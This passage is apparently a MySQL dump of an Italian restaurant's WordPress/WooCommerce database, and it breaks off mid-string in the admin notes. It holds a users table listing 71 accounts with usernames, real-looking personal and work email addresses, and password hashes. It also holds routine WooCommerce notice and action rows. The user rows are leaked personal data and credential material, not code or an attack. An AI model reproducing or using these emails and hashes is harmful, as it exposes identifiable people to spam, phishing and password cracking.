/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) NOT NULL DEFAULT '',
  `user_pass` varchar(255) NOT NULL DEFAULT '',
  `user_nicename` varchar(50) NOT NULL DEFAULT '',
  `user_email` varchar(100) NOT NULL DEFAULT '',
  `user_url` varchar(100) NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=MyISAM AUTO_INCREMENT=72 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_users`
--

LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'magnaromagna','$P$BkkSGlLHuDLn5NW/AiQhY6T8/vMnx10','magnaromagna','webmaster@baldisserri.com','','2015-07-29 12:22:27','1544810446:$P$BfTTJ5L7pImNFROOpw/uDyANfItmMT.',0,'magnaromagna'),(2,'solymar','$P$BXnlPl2bbtIN0FHCZbwyJUled9LysX/','solymar','teosphone@gmail.com','','2015-08-26 08:57:43','',0,'Teo'),(3,'gionata.calzolari2012','$P$B9eSIEQiDdvJr4.GFquvj9gIRSfr8G.','gionata-calzolari2012','gionata.calzolari2012@gmail.com','','2016-11-30 07:38:46','',0,'CALZOLARI Gionata'),(4,'valina_d83','$P$BbDOTy9breF/tJKWPs9YqQA3zn6PSZ0','valina_d83','valina_d83@hotmail.it','','2016-12-15 14:55:09','',0,'Valentina'),(5,'ricciardone','$P$BMMabAgKTyP4Q60QcsQR9dkECwPlxI0','ricciardone','ricciardone@alice.it','','2017-02-11 19:09:31','',0,'massimiliano'),(6,'Lorenzob','$P$BR1yQ8YeC7oEKp6NJ0yyQ1vcmNEwGu1','lorenzob','Lorenzob@debsrl.com','','2017-02-13 10:59:28','',0,'Lorenzo'),(7,'lauraugolini87','$P$BRI37JusBd2tI5fJjx96moyL/aJCKL/','lauraugolini87','lauraugolini87@gmail.com','','2017-02-14 09:11:27','',0,'Laura'),(8,'francesco.turco71','$P$BBCs/bcFQRttQkCIDJNPWlHXZkfdnA.','francesco-turco71','francesco.turco71@gmail.com','','2017-03-23 18:29:34','',0,'Francesco'),(9,'matteo.gbb','$P$BmUkSOwQOuKZVbVryXVex3MCJIPbPh/','matteo-gbb','matteo.gbb@gmail.com','','2017-03-28 11:23:20','',0,'Matteo'),(10,'davide.perni','$P$Bfo4hqyk1KYgVDOhVBnXH18rdxiDFE.','davide-perni','davide.perni@ducati.com','','2017-03-29 20:32:53','',0,'DAVIDE'),(11,'maccagnani.piero','$P$BdNFsEFBEXf3sKcz3Xof0F1dz2719n.','maccagnani-piero','maccagnani.piero@gmail.com','','2017-04-02 15:32:24','',0,'Piero'),(12,'Edoardozona','$P$BsPYjV3v1ui6cUN33OckTayn/k9tPH1','edoardozona','Edoardozona@msn.com','','2017-04-07 20:29:19','',0,'Edoardo'),(13,'Benedetta.maccalli','$P$B2K1Llrn6hdslygxNBmhRQE5xJzGrj1','benedetta-maccalli','Benedetta.maccalli@gmail.com','','2017-04-15 09:10:28','',0,'Benedetta'),(14,'leomatrix','$P$BxOVkeGwksy0Cp9yXM6xsXTCLeYq4o.','leomatrix','leomatrix@virgilio.it','','2017-12-03 08:09:32','',0,'leomatrix'),(15,'Alessandro.schwarz','$P$BMSra4Yuwnh2.mYYyd5Dejjw3ocE.U/','alessandro-schwarz','Alessandro.schwarz@errelle.net','','2017-12-17 11:31:49','',0,'Alessandro.schwarz'),(16,'stefano.agnoletti','$P$BdvUZ3eQo6R87NXyQMl9v2QlBteB7U1','stefano-agnoletti','stefano.agnoletti@virgilio.it','','2017-12-20 17:13:00','',0,'stefano.agnoletti'),(17,'Marcocastellani000','$P$BaiZdYjntwyqg7f7WLtQ.7A0kjHpjI1','marcocastellani000','Marcocastellani000@gmail.com','','2017-12-23 18:07:26','',0,'Marcocastellani000'),(18,'itamar.zanotti','$P$B/IshcYXvFiy6q/5QFqEwkm9kMcrVH1','itamar-zanotti','itamar.zanotti@icloud.com','','2018-01-29 14:01:14','',0,'itamar.zanotti'),(19,'marcouguccioni98','$P$BxliHvxOvFduOEGLvpUKdmB/GBRRBs/','marcouguccioni98','marcouguccioni98@gmail.com','','2018-02-11 20:32:46','',0,'marcouguccioni98'),(20,'Marangonimattia','$P$B542Jdr5upLzmtplpwyXcNHkGBRs4b/','marangonimattia','Marangonimattia@me.com','','2018-02-12 17:49:49','',0,'Marangonimattia'),(21,'virginiadellabalda','$P$BTLVRNy3gQCJOveBzXKQwFic7bG/MS.','virginiadellabalda','virginiadellabalda@me.com','','2018-02-12 18:16:45','',0,'virginiadellabalda'),(22,'l.piermarini','$P$BNhTwnKP1k6Fi7l0e.P6x6ax7VX8Cc.','l-piermarini','l.piermarini@yahoo.com','','2018-02-14 15:04:55','',0,'l.piermarini'),(23,'andrea.mennini','$P$BwgW1TiKq4tV7wHpHm/6AdVRTUu0.F1','andrea-mennini','andrea.mennini@gmail.com','','2018-03-10 11:40:30','',0,'andrea.mennini'),(24,'danielataroni','$P$BVeNiMOFn3E1SDvIG3MYxTeUngJxhA.','danielataroni','danielataroni@libero.it','','2018-03-12 13:26:37','',0,'danielataroni'),(25,'ale.canevari','$P$B/s6fjw9ts6Z.prBRqEpugECpbc/vd/','ale-canevari','ale.canevari@hotmail.it','','2018-03-14 15:20:25','',0,'ale.canevari'),(26,'Martinamazzucchelli','$P$B6NxxQ2O0TURtPByK.lPU/KSUcb4Sq1','martinamazzucchelli','Martinamazzucchelli@gmail.com','','2018-03-23 16:35:50','',0,'Martinamazzucchelli'),(27,'mventuri','$P$B4HBIeHQo3TmcUkJC4LF9/.OJeZl0D.','mventuri','mventuri@me.com','','2018-03-26 15:03:38','',0,'mventuri'),(28,'davolifabio75','$P$Bmm3UCra.GnkTbwDozZmyUn/VULV1v/','davolifabio75','davolifabio75@gmail.com','','2018-03-28 21:45:49','',0,'davolifabio75'),(29,'MerighiGiorgia','$P$BWhH5EFaJMjcLIbCV7mne3Q4YUrgh.0','merighigiorgia','MerighiGiorgia@gmail.com','','2018-03-29 11:30:45','',0,'MerighiGiorgia'),(30,'simonesanticcioli','$P$B0ZoF6qDgBdje1JYAdHuuRxH/N/eGy/','simonesanticcioli','simonesanticcioli@gmail.com','','2018-03-30 14:50:17','',0,'simonesanticcioli'),(31,'Santaharizaj','$P$BuR5c6i1A3eAXtGv.JVytr/ajCLUXd/','santaharizaj','Santaharizaj@gmail.com','','2018-03-30 18:10:44','',0,'Santaharizaj'),(32,'marty.mel86','$P$BYuIpqkqxD/ICDvjF6vafXAe2tD6tQ1','marty-mel86','marty.mel86@gmail.com','','2018-05-22 06:28:10','',0,'marty.mel86'),(33,'elisa_semprucci','$P$BThTup4j5z5ChjZ7v7QwEY/n27yeaV1','elisa_semprucci','elisa_semprucci@yahoo.it','','2018-07-14 15:05:42','',0,'elisa_semprucci'),(34,'liquim','$P$BCJuATxijJpdgC8e.2NzewcDGhzZer/','liquim','liquim@libero.it','','2018-07-18 16:35:51','',0,'liquim'),(35,'lorenzo.prandini','$P$B3hkbT9dMwG9kMTxW61UbDNoz2iL0Q/','lorenzo-prandini','lorenzo.prandini@virgilio.it','','2018-12-27 10:32:31','',0,'lorenzo.prandini'),(36,'abattis','$P$Btawzk4JzkcGQZn7Fs1XiqdvpEfKao/','abattis','abattis@libero.it','','2019-02-01 18:02:19','',0,'abattis'),(37,'lucasemprini23','$P$BrpmjUMPEaikpEwZ1zgqc32VJDxd0y0','lucasemprini23','lucasemprini23@gmail.com','','2019-02-02 06:30:42','',0,'lucasemprini23'),(38,'Nicola.zolikm','$P$B7dTqywFfIAp2CsEwrI5i6Rtfarrj./','nicola-zolikm','Nicola.zolikm@gmail.com','','2019-02-02 11:28:05','',0,'Nicola.zolikm'),(39,'fedytordi','$P$BsugbE7JHO4yELpTnlSmlIvl9DDm9y/','fedytordi','fedytordi@gmail.com','','2019-02-08 13:59:42','',0,'fedytordi'),(40,'christopherandruccioli54','$P$BsKMkMJCISCJYoNi.qosOwpdXDDd2Q/','christopherandruccioli54','christopherandruccioli54@gmail.com','','2019-02-10 22:04:13','',0,'christopherandruccioli54'),(41,'fausto.terenzi','$P$Be/rr1G1tlI6kLI/ra4ixI/KCZKdi61','fausto-terenzi','fausto.terenzi@tiscali.it','','2019-02-11 09:40:28','',0,'fausto.terenzi'),(42,'him_85','$P$B70D7p3khIflq4.AJ7wWx5yl4XwBRB1','him_85','him_85@inbox.ru','','2019-02-11 10:50:44','',0,'him_85'),(43,'alex_93_5300','$P$BjvnAtgpItGtBAoqkkhUjbwOt9NHeF1','alex_93_5300','alex_93_5300@hotmail.it','','2019-02-12 13:18:17','',0,'alex_93_5300'),(44,'Pietro.Fattori','$P$BpvysCPFHrrczcD3dipCvZzj3y3TSA1','pietro-fattori','Pietro.Fattori@hotmail.it','','2019-02-12 18:15:45','',0,'Pietro.Fattori'),(45,'Denn7401','$P$Bg4OeNujWa5TnQmp8Hf2esjQQVzYVy/','denn7401','Denn7401@gmail.com','','2019-02-12 18:36:00','',0,'Denn7401'),(46,'sara-fabbri','$P$BJbLWYR2en2qxjRrranI6XhqlZc/Sa.','sara-fabbri','sara-fabbri@hotmail.it','','2019-02-14 11:03:48','',0,'sara-fabbri'),(47,'christinaamplatz','$P$BTCxr8EkEamHV5aC9e/bWN1QVXcOMj/','christinaamplatz','christinaamplatz@gmail.com','','2019-03-12 15:08:46','',0,'christinaamplatz'),(48,'valezones','$P$BRmXLFRAixbaUiQy8nvmzf.mEYAjqb1','valezones','valezones@yahoo.it','','2019-03-25 17:14:32','',0,'valezones'),(49,'fabio.santini','$P$Bre3JqqtPfZCSllj4ISEBQHrHRvGEf.','fabio-santini','fabio.santini@remediasrl.com','','2019-04-04 19:31:22','',0,'fabio.santini'),(50,'Glamroom86','$P$BHNFBWtafAzmidTWmVqIZlzHmJo/J.1','glamroom86','Glamroom86@gmail.com','','2019-04-14 13:40:40','',0,'Glamroom86'),(51,'Oliunea','$P$Bv6TVObbUN/pl12LUkDWk0khcq4VSb.','oliunea','Oliunea@icloud.com','','2019-04-15 17:55:15','',0,'Oliunea'),(52,'natalinofaina567','$P$BQym0.ABTOrX2JjBQ3lg5H1/AwT9qP/','natalinofaina567','natalinofaina567@hotmail.it','','2019-04-17 13:02:23','',0,'natalinofaina567'),(53,'zzzale','$P$BXPjs7rgJzLSBpOLaRmlc17APhuTGN/','zzzale','zzzale@gmail.com','','2019-04-20 09:25:28','',0,'zzzale'),(54,'Fbambulatorio','$P$BU/dEaFUJxLWdxdx97pMgr//BfWJOW/','fbambulatorio','Fbambulatorio@gmail.com','','2019-04-20 18:07:26','',0,'Fbambulatorio'),(55,'fabio.domenichini92','$P$BrUOUeEsoiJC2Z4DK86MUGSThJ473h0','fabio-domenichini92','fabio.domenichini92@gmail.com','','2019-04-23 17:06:04','',0,'fabio.domenichini92'),(56,'rebeccapedrazzi97','$P$BczffHvs2Zx7pxTRBBDAxyMSpAMzs0.','rebeccapedrazzi97','rebeccapedrazzi97@gmail.com','','2019-06-05 14:27:27','',0,'rebeccapedrazzi97'),(57,'mariadyatlova','$P$BbdtCsg7gFzlUqvK3EYBhtjlCxSdV..','mariadyatlova','maria11556@mail.ru','','2019-08-14 14:34:40','',0,'Maria Dyatlova'),(58,'roberto.zanasi','$P$Bpxh2A3Wj8t232pUM3/qQgf3aEESuc0','roberto-zanasi','zanasi76@gmail.com','','2019-12-18 17:09:30','',0,'Roberto Zanasi'),(59,'mattia.biografi','$P$BkmynmJqtmt4gqRVW6NEvMqLs0njOo/','mattia-biografi','mattiabio@hotmail.it','','2020-02-05 19:46:05','',0,'Mattia Biografi'),(60,'tommaso.stefanini','$P$ByGTL1QM.TDzxJykj7WP7D/SmPiuFR1','tommaso-stefanini','tommasostefanini@libero.it','','2020-02-09 10:45:27','',0,'Tommaso Stefanini'),(61,'mauro.iacolin','$P$BIEFgYoHKjQ3Amy6y4l8ss5ddWVBU.0','mauro-iacolin','Mauro.iacolin@gmail.com','','2020-02-11 13:52:03','',0,'Mauro Iacolin'),(62,'mailjet','$P$BuUYe3gkH8bCrrgBNUQxpMDKTuCubF1','mailjet','franco@ristorantesolymar.it','','2020-06-08 16:30:46','',0,'mailjet'),(63,'kvchosting','$P$BiOEU/G8yXeThP08NUXjZBHi/9iYQO1','kvchosting','kvchosting@ristorantesolymar.it','','2020-06-08 16:39:13','',0,'kvchosting'),(64,'jdydpehffrf','$P$BMf0N/7qYYZ4ZsvvnFne.8FmWDe81z.','jdydpehffrf','jdydpehffrf@demo.com','','2020-12-31 15:44:26','',0,'jdydpehffrf'),(65,'lupswrgooxz','$P$BrR0ogQNXmdw8wMgnhFGY4GWUT1gL71','lupswrgooxz','lupswrgooxz@demo.com','','2021-01-01 11:45:44','',0,'lupswrgooxz'),(66,'stanszoqcjq','$P$B1Cfbn6lU10aKtJ8KBVuNGBJHAoP/F0','stanszoqcjq','stanszoqcjq@demo.com','','2021-01-06 23:59:26','',0,'stanszoqcjq'),(67,'jilzwxkumqq','$P$BAixbphMOSv72vER/4YXCXqwzwSYLj/','jilzwxkumqq','jilzwxkumqq@demo.com','','2021-01-07 11:27:06','',0,'jilzwxkumqq'),(68,'franzoni.elena','$P$B1CtDP/lGus7Rmxn3cQljtCwmkDr4G0','franzoni-elena','franzoni.elena@gmail.com','','2021-01-20 17:27:30','',0,'franzoni.elena'),(69,'yxyzxxfsdvx','$P$BvhPlcU0S0RHA2Vf8GuaI4ypCr4jtV.','yxyzxxfsdvx','yxyzxxfsdvx@sdemo.com','','2021-01-21 20:37:49','',0,'yxyzxxfsdvx'),(70,'tjxkptpcknz','$P$Blw8QDkxsm69y/aDL8GGiT0btX6PXk.','tjxkptpcknz','tjxkptpcknz@sdemo.com','','2021-01-22 10:00:36','',0,'tjxkptpcknz'),(71,'attika','$P$BP9bBLRh6IZ.Jwq1Kg8d0WseozEWUD/','attika','attika@ristorantesolymar.it','','2021-01-23 20:00:51','',0,'attika');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_admin_note_actions`
--

DROP TABLE IF EXISTS `wp_wc_admin_note_actions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wc_admin_note_actions` (
  `action_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `note_id` bigint(20) unsigned NOT NULL,
  `name` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `label` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `query` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `status` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `is_primary` tinyint(1) NOT NULL DEFAULT '0',
  `actioned_text` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  PRIMARY KEY (`action_id`),
  KEY `note_id` (`note_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2296 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_admin_note_actions`
--

LOCK TABLES `wp_wc_admin_note_actions` WRITE;
/*!40000 ALTER TABLE `wp_wc_admin_note_actions` DISABLE KEYS */;
INSERT INTO `wp_wc_admin_note_actions` VALUES (1,1,'get-started','Inizia ora','?page=wc-admin&path=/analytics/settings&import=true','actioned',1,''),(4,4,'connect','Connetti','?page=wc-addons&section=helper','actioned',0,''),(40,6,'review-orders','Rivedi i tuoi ordini','?page=wc-admin&path=/analytics/orders','actioned',0,''),(41,7,'learn-more','Per saperne di più','https://woocommerce.com/mobile/','actioned',0,''),(43,8,'tracking-opt-in','Attiva la tracciabilità dell\'utilizzo','','actioned',1,''),(44,9,'yes-please','Sì.','https://woocommerce.us8.list-manage.com/subscribe/post?u=2c1434dc56f9506bf3c3ecd21&amp;id=13860df971&amp;SIGNUPPAGE=plugin','actioned',0,''),(45,10,'open-marketing-hub','Apri l\'hub di marketing','https://www.ristorantesolymar.it/wp-admin/admin.php?page=wc-admin&path=/marketing','actioned',0,''),(47,11,'share-feedback','Condividi il tuo feedback','https://automattic.survey.fm/new-onboarding-survey','actioned',0,''),(54,13,'learn-more','Per saperne di più','https://woocommerce.com/mobile/?utm_source=inbox','actioned',0,''),(55,14,'affirm-insight-first-sale','Sì','','actioned',0,'Grazie per il feedback'),(56,14,'deny-insight-first-sale','No','','actioned',0,'Grazie per il feedback'),(405,5,'update-db_done','Grazie!','https://www.ristorantesolymar.it/wp-admin/edit.php?post_type=shop_order&wc-hide-notice=update&_wc_notice_nonce=692d539e04','actioned',1,''),(430,18,'home-screen-feedback-share-feedback','Share feedback','https://automattic.survey.fm/home-screen-survey','actioned',0,''),(773,21,'learn-more','Learn more','https://woocommerce.com/mobile/?utm_source=inbox','actioned',0,''),(2282,15,'set-up-concierge','Schedule free session','https://wordpress.com/me/concierge','actioned',1,''),(2283,16,'learn-more','Learn more','https://docs.woocommerce.com/document/woocommerce-shipping-and-tax/?utm_source=inbox','unactioned',1,''),(2284,17,'learn-more-ecomm-unique-shopping-experience','Learn more','https://docs.woocommerce.com/document/product-add-ons/?utm_source=inbox','actioned',1,''),(1565,19,'install-now','Install now','admin.php?page=wc-admin&action=setup-woocommerce-payments','actioned',1,''),(1566,20,'install-now','Install now','admin.php?page=wc-admin&action=setup-woocommerce-payments','actioned',1,''),(1567,22,'install-now','Install now','admin.php?page=wc-admin&action=setup-woocommerce-payments','actioned',1,''),(1568,23,'install-now','Install now','admin.php?page=wc-admin&action=setup-woocommerce-payments','actioned',1,''),(885,25,'view-report','View report','?page=wc-admin&path=/analytics/revenue&period=custom&compare=previous_year&after=2020-12-24&before=2020-12-24','actioned',0,''),(1019,26,'learn-more','Learn more','https://docs.woocommerce.com/document/woocommerce-analytics/#variations-report','actioned',0,''),(2286,27,'learn-more','Learn more','https://woocommerce.com/posts/ecommerce-shipping-solutions-guide/?utm_source=inbox','actioned',1,''),(2285,28,'watch-the-webinar','Watch the webinar','https://youtu.be/V_2XtCOyZ7o','actioned',1,''),(1326,29,'learn-more','Per saperne di più','https://woocommerce.com/mobile/?utm_source=inbox','actioned',0,''),(2287,30,'boost-sales-marketing-guide','See marketing guide','https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=square-boost-sales','actioned',1,''),(2288,31,'grow-your-business-marketing-guide','See marketing guide','https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=square-grow-your-business','actioned',1,''),(2280,32,'upgrade_now_facebook_pixel_api','Upgrade now','plugin-install.php?tab=plugin-information&plugin=&section=changelog','actioned',1,''),(2281,33,'learn_more_facebook_ec','Learn more','https://woocommerce.com/products/facebook/','unactioned',1,''),(2293,34,'optimizing-the-checkout-flow','Learn more','https://woocommerce.com/posts/optimizing-woocommerce-checkout?utm_source=inbox','actioned',1,''),(2294,35,'learn-more','Learn more','https://woocommerce.com/posts/first-things-customize-woocommerce/?utm_source=inbox','unactioned',1,''),(1731,36,'install-mollie','Install Mollie','https://wordpress.org/plugins/mollie-payments-for-woocommerce/','actioned',1,''),(2291,37,'boost-sales-marketing-guide','See marketing guide','https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=wcpay-boost-sales','actioned',1,''),(2292,38,'grow-your-business-marketing-guide','See marketing guide','https://developer.apple.com/apple-pay/marketing/?utm_source=inbox&utm_campaign=wcpay-grow-your-business','actioned',1,''),(2289,39,'add-apple-pay','Add Apple Pay','/admin.php?page=wc-settings&tab=checkout&section=woocommerce_payments','actioned',1,''),(2290,39,'learn-more','Learn more','https://docs.woocommerce.com/document/payments/apple-pay/?utm_source=inbox&utm_medium=product&utm_campaign=wcpay_applepay','actioned',1,''),(2279,40,'open_wc_paypal_payments_product_page','Learn more','https://woocommerce.com/products/woocommerce-paypal-payments/','actioned',1,''),(2295,41,'qualitative-feedback-from-new-users','Share feedback','https://automattic.survey.fm/wc-pay-new','actioned',1,'');
/*!40000 ALTER TABLE `wp_wc_admin_note_actions` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wc_admin_notes`
--

DROP TABLE IF EXISTS `wp_wc_admin_notes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wc_admin_notes` (
  `note_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `type` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `locale` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `title` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `content` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `icon` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT 'info',
  `content_data` longtext COLLATE utf8mb4_unicode_520_ci,
  `status` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `source` varchar(200) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_reminder` datetime DEFAULT NULL,
  `is_snoozable` tinyint(1) NOT NULL DEFAULT '0',
  `layout` varchar(20) COLLATE utf8mb4_unicode_520_ci NOT NULL DEFAULT '',
  `image` varchar(200) COLLATE utf8mb4_unicode_520_ci DEFAULT NULL,
  `is_deleted` tinyint(1) NOT NULL DEFAULT '0',
  PRIMARY KEY (`note_id`)
) ENGINE=MyISAM AUTO_INCREMENT=42 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wc_admin_notes`
--

LOCK TABLES `wp_wc_admin_notes` WRITE;
/*!40000 ALTER TABLE `wp_wc_admin_notes` DISABLE KEYS */;
INSERT INTO `wp_wc_admin_notes` VALUES (1,'wc-admin-historical-data','update','en_US','WooCommerce Admin: Dati di analisi storici','Per visualizzare i dati di analisi storici, devi elaborare gli ordini e i clienti esistenti.','info','{}','unactioned','woocommerce-admin','2020-04-29 22:13:47',NULL,0,'',NULL,0),(4,'wc-admin-wc-helper-connection','info','en_US','Connettiti a WooCommerce.com','Connettiti per ottenere notifiche e aggiornamenti sui prodotti importanti.','info','{}','unactioned','woocommerce-admin','2020-04-29 22:13:58',NULL,0,'',NULL,0),(5,'wc-update-db-reminder','update','en_US','Aggiornamento database WooCommerce completato','Aggiornamento del database di WooCommerce completato. Grazie per aver aggiornato all\'ultima versione!','info','{}','actioned','woocommerce-core','2020-04-12 12:13:58',NULL,0,'plain',NULL,0),(6,'wc-admin-orders-milestone','info','en_US','Congratulazioni per l\'elaborazione dei 250 ordini!','Un altro ordine importante! Guarda il tuo rapporto sugli ordini per rivedere gli ordini fino ad oggi.','trophy','{}','unactioned','woocommerce-admin','2020-06-17 07:57:13',NULL,0,'',NULL,0),(7,'wc-admin-mobile-app','info','en_US','Installa l\'app Woo','Installa l\'app per dispositivi mobili WooCommerce per gestire gli ordini, riceve le notifiche delle vendite e visualizzare le metriche chiave, ovunque tu sia.','phone','{}','unactioned','woocommerce-admin','2020-06-17 07:57:36',NULL,0,'',NULL,0),(8,'wc-admin-usage-tracking-opt-in','info','en_US','Aiuta a migliorare WooCommerce con il tracciamento dell\'uso','Raccogliere i dati di utilizzo ci consente di migliorare WooCommerce. Il tuo negozio verrà tenuto in considerazione nel momento in cui valuteremo nuove funzioni, giudicheremo la qualità di un aggiornamento o determineremo se un miglioramento ha senso. Puoi sempre visitare le <a href=\"https://www.ristorantesolymar.it/wp-admin/admin.php?page=wc-settings&#038;tab=advanced&#038;section=woocommerce_com\" target=\"_blank\">Impostazioni</a> e scegliere di interrompere la condivisione dei dati. <a href=\"https://woocommerce.com/usage-tracking\" target=\"_blank\">Scopri di più</a> su quali dati raccogliamo.','info','{}','unactioned','woocommerce-admin','2020-06-17 07:57:36',NULL,0,'',NULL,0),(9,'wc-admin-onboarding-email-marketing','info','en_US','Suggerimenti, aggiornamenti sui prodotti e ispirazione','Siamo qui per te. Ricevi suggerimenti, aggiornamenti di prodotto e ispirazione direttamente nella casella di posta elettronica','mail','{}','unactioned','woocommerce-admin','2020-06-17 07:57:36',NULL,0,'',NULL,0),(10,'wc-admin-marketing-intro','info','en_US','Collegati al tuo pubblico','Fai crescere la base di clienti e aumenta le vendite con gli strumenti di marketing integrati per WooCommerce.','speaker','{}','unactioned','woocommerce-admin','2020-06-17 07:57:36',NULL,0,'',NULL,0),(11,'wc-admin-store-notice-giving-feedback-2','info','en_US','Lasciaci un feedback','Ora che ci hai scelto come partner, il nostro obiettivo è quello di avere la certezza di fornirti i giusti strumenti per soddisfare i tuoi bisogni. Non vediamo l\'ora di ricevere il tuo feedback sull\'esperienza di configurazione del negozio in modo da poterla migliorare in futuro.','info','{}','unactioned','woocommerce-admin','2020-07-09 09:34:35',NULL,0,'plain','',0),(13,'wc-admin-real-time-order-alerts','info','en_US','Ottieni avvisi degli ordini ovunque in tempo reale','Ottieni notifiche sull\'attività del negozio, tra cui i nuovi ordini e le recensioni del prodotto, direttamente sui dispositivi mobili con l\'app Woo.','info','{}','unactioned','woocommerce-admin','2020-08-11 09:33:06',NULL,0,'plain','',0),(14,'wc-admin-insight-first-sale','survey','en_US','Lo sapevi?','Un negozio promosso da WooCommerce ha bisogno di una media di 31 giorni per ottenere la prima vendita. Stai andando nella giusta direzione! Hai trovato utile questo tipo di panoramica?','info','{}','unactioned','woocommerce-admin','2020-08-19 09:33:08',NULL,0,'plain','',0),(15,'ecomm-need-help-setting-up-your-store','info','en_US','Need help setting up your Store?','Schedule a free 30-min <a href=\"https://wordpress.com/support/concierge-support/\">quick start session</a> and get help from our specialists. We’re happy to walk through setup steps, show you around the WordPress.com dashboard, troubleshoot any issues you may have, and help you the find the features you need to accomplish your goals for your site.','info','{}','pending','woocommerce.com','2020-09-25 09:39:36',NULL,0,'plain','',0),(16,'woocommerce-services','info','en_US','WooCommerce Shipping & Tax','WooCommerce Shipping &amp; Tax helps get your store “ready to sell” as quickly as possible. You create your products. We take care of tax calculation, payment processing, and shipping label printing! Learn more about the extension that you just installed.','info','{}','pending','woocommerce.com','2020-09-25 09:39:36',NULL,0,'plain','',0),(17,'ecomm-unique-shopping-experience','info','en_US','For a shopping experience as unique as your customers','Product Add-Ons allow your customers to personalize products while they’re shopping on your online store. No more follow-up email requests—customers get what they want, before they’re done checking out. Learn more about this extension that comes included in your plan.','info','{}','pending','woocommerce.com','2020-09-25 09:39:36',NULL,0,'plain','',0),(18,'wc-admin-home-screen-feedback','info','en_US','Help us improve the WooCommerce Home screen','We\'d love your input to shape the future of the WooCommerce Home screen together. Feel free to share any feedback, ideas or suggestions that you have.','info','{}','unactioned','woocommerce-admin','2020-10-27 09:34:41',NULL,0,'plain','',0),(19,'wcpay-promo-2020-11','marketing','en_US','Manage subscriber payments from your store\'s dashboard','Securely accept cards and manage transactions right from your dashboard with <a href=\"https://woocommerce.com/payments/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay_ctrl20\" target=\"_blank\">WooCommerce Payments</a>  – now supporting <a href=\"https://woocommerce.com/products/woocommerce-subscriptions/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay_ctrl20\" target=\"_blank\">WooCommerce Subscriptions</a>! <br /><br /><em>By clicking \"Install now,\" you agree to our <a href=\"https://wordpress.com/tos/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay_ctrl20\" target=\"_blank\">Terms of Service</a>.</em>','info','{}','pending','woocommerce.com','2020-11-14 07:47:24',NULL,0,'plain','',0),(20,'wcpay-subscriptions-2020-11','marketing','en_US','Manage subscriber payments from your store\'s dashboard','Securely accept cards and manage transactions right from your dashboard with <a href=\"https://woocommerce.com/payments/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay_ctrl20\" target=\"_blank\">WooCommerce Payments</a>  – now supporting <a href=\"https://woocommerce.com/products/woocommerce-subscriptions/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay_ctrl20\" target=\"_blank\">WooCommerce Subscriptions</a>! <br /><br /><em>By clicking \"Install now,\" you agree to our <a href=\"https://wordpress.com/tos/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay_ctrl20\" target=\"_blank\">Terms of Service</a>.</em>','info','{}','pending','woocommerce.com','2020-11-14 07:47:24',NULL,0,'plain','',0),(21,'wc-admin-manage-orders-on-the-go','info','en_US','Manage your orders on the go','Look for orders, customer info, and process refunds in one click with the Woo app.','info','{}','unactioned','woocommerce-admin','2020-12-09 09:34:11',NULL,0,'plain','',0),(22,'wcpay-promo-2020-12','marketing','en_US','Get 50% off transaction fees with WooCommerce Payments','Keep more of your hard-earned cash by adding <a href=\"https://woocommerce.com/payments/?utm_medium=notification&amp;utm_source=product&amp;utm_campaign=wcpay_exp20\" target=\"_blank\">WooCommerce Payments</a> to your store. Lock in a discounted rate of 1.5% + $0.15 for $25,000 of payments (or three months, whichever comes first). Limited time offer – don’t miss out! <br /><br /><em>By clicking \"Install now,\" you agree to our promotional <a 